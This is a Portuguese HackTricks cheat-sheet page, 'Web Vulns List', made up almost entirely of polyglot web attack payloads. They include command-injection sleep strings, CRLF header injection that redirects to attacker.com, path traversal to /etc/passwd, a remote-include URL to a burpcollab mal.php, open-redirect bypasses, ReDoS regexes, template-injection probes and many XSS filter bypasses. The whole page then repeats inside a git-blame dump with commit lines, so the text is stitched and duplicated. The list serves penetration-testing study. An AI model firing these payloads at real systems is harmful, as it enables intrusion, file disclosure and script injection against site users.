hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md

# Web Vulns List

## Lista de Vulnerabilidades Web

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

\`\`\`python \{{7\*7\}}\[7\*7] 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /\*$(sleep 5)\`sleep 5\`\`\*/-sleep(5)-'/\*$(sleep 5)\`sleep 5\` #\*/-sleep(5)||'"||sleep(5)||"/\*\`\*/ %0d%0aLocation:%20http://attacker.com %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E\


## THIS IS AND INJECTED TITLE

/etc/passwd ../../../../../../etc/hosts ..\\..\\..\\..\\..\\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\\..\\..\\..\\..\\..\windows/system32/drivers/etc/hosts http://asdasdasdasd.burpcollab.com/mal.php \\\asdasdasdasd.burpcollab.com/mal.php www.whitelisted.com www.whitelisted.com.evil.com https://google.com //google.com javascript:alert(1) (\\\w\*)+$ (\[a-zA-Z]+)\*$ ((a+)+)+$ x=>alert(/Chrome%20XSS%20filter%20bypass/);> \{{7\*7\}}${7\*7}<%= 7\*7 %>$\{{7\*7\}}#{7\*7}$\{{<%\[%'"\}}%\ " onclick=alert() a=" '">![](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/pocs-and-polygloths-cheatsheet/x) javascript:alert() javascript:"/\*'/\*\`/\*--> -->'"/>

&#x20;">>![](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/pocs-and-polygloths-cheatsheet/x)" >\<script>prompt(1)\</script>@gmail.com\<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" >\</script>\<script>alert(1)\</script>">\<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">\<img src="http: //i.imgur.com/P8mL8.jpg">\
" onclick=alert(1)//\<button ‘ onclick=alert(1)//> \*/ alert(1)//\
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >\</SCRIPT>">'>\<SCRIPT>alert(String.fromCharCode(88,83,83)) \</SCRIPT>\
\`\`\`\
\<details>**Aprenda hacking AWS do zero ao herói com** [**htARTE (HackTricks AWS Red Team Expert)**](https://training.hacktricks.xyz/courses/arte)**!**

* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												GitBook: No commit message

											
										
										
											2024-04-06 19:38:49 +00:00
+								# Web Vulns List
 								## Lista de Vulnerabilidades Web
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:09:41 +00:00
+								<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:09:41 +00:00
+								* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:09:41 +00:00
+								* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
-												GitBook: No commit message

											
										
										
											2024-04-06 19:38:49 +00:00
+								* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 								* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GitBook: No commit message

											
										
										
											2024-04-06 19:38:49 +00:00
+								\`\`\`python \{{7\*7\}}\[7\*7] 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /\*$(sleep 5)\`sleep 5\`\`\*/-sleep(5)-'/\*$(sleep 5)\`sleep 5\` #\*/-sleep(5)||'"||sleep(5)||"/\*\`\*/ %0d%0aLocation:%20http://attacker.com %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E\
 								## THIS IS AND INJECTED TITLE
 								/etc/passwd ../../../../../../etc/hosts ..\\..\\..\\..\\..\\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\\..\\..\\..\\..\\..\windows/system32/drivers/etc/hosts http://asdasdasdasd.burpcollab.com/mal.php \\\asdasdasdasd.burpcollab.com/mal.php www.whitelisted.com www.whitelisted.com.evil.com https://google.com //google.com javascript:alert(1) (\\\w\*)+$ (\[a-zA-Z]+)\*$ ((a+)+)+$ x=>alert(/Chrome%20XSS%20filter%20bypass/);> \{{7\*7\}}${7\*7}<%= 7\*7 %>$\{{7\*7\}}#{7\*7}$\{{<%\[%'"\}}%\ " onclick=alert() a=" '">![](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/pocs-and-polygloths-cheatsheet/x) javascript:alert() javascript:"/\*'/\*\`/\*--> -->'"/>
 								&#x20;">>![](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/pocs-and-polygloths-cheatsheet/x)" >\<script>prompt(1)\</script>@gmail.com\<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" >\</script>\<script>alert(1)\</script>">\<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">\<img src="http: //i.imgur.com/P8mL8.jpg">\
 								" onclick=alert(1)//\<button ‘ onclick=alert(1)//> \*/ alert(1)//\
 								';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >\</SCRIPT>">'>\<SCRIPT>alert(String.fromCharCode(88,83,83)) \</SCRIPT>\
 								\`\`\`\
 								\<details>**Aprenda hacking AWS do zero ao herói com** [**htARTE (HackTricks AWS Red Team Expert)**](https://training.hacktricks.xyz/courses/arte)**!**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:09:41 +00:00
+								* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:09:41 +00:00
+								* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
-												GitBook: No commit message

											
										
										
											2024-04-06 19:38:49 +00:00
+								* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 								* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).